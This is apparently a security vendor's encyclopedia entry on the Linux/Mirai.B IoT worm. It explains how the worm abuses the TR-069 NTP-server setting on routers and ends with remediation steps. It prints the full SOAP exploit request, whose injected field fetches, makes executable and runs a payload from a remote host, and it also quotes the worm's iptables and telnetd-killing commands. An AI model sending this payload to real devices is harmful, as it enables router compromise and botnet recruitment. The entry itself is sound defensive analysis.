Threat Encyclopedia

Linux/Mirai.B!worm

Analysis

Linux/Mirai.B!worm is a bot which runs on Linux distributions on which busybox is available. It particularly targets IoT devices. Its well known variant, Linux/Mirai.A!worm, is known to have caused DDoS of several companies and websites. So far, Linux/Mirai.B!worm is said to have affected a German operator.

The malware exploits a known vulnerability in the TR-069 configuration protocol. The TR-069 protocol is used to manage routers and modems. With TR-069, you can:

  • Get information on the router or modem
  • Run DSL diagnostics
  • Adjust time
  • ...
Concerning time adjustment, it is possible to specify a NTP server to use and automatically synchronize time. Unfortunately, the implementation of the protocol is vulnerable on some routers and modems and allows for code execution.
Linux/Mirai.B!worm exploits this vulnerability and crafts a special request to configure a new NTP server, but instead of providing the name of a valid NTP server, it provides shell code that downloads a malicious payload from a remote server. For example:
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
In that case, the malicious sample sets the new NTP server to
`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`
This means it goes to tmp directory, downloads a malicious payload from a website named l.ocalhost.host (note this is different from localhost - the server does not resolve any longer), the malicious payload is named 2. This program is set as executable, and run.
An infected device does the following:
  • Scan devices for open port 7547 (that's the port for TR-069). If it is open, attempt to infect by posting the SOAP request we displayed above.
  • Block port 7547 to prevent re-infection. This is done by a simple iptables command:
    busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
    
  • Block telnet as well
    busybox killall -9 telnetd
    

Recommended Action

To cure the device:

  1. Reboot the device. The malware does not persist after reboot.
  2. Update the device's firmware (if possible) so that it is no longer vulnerable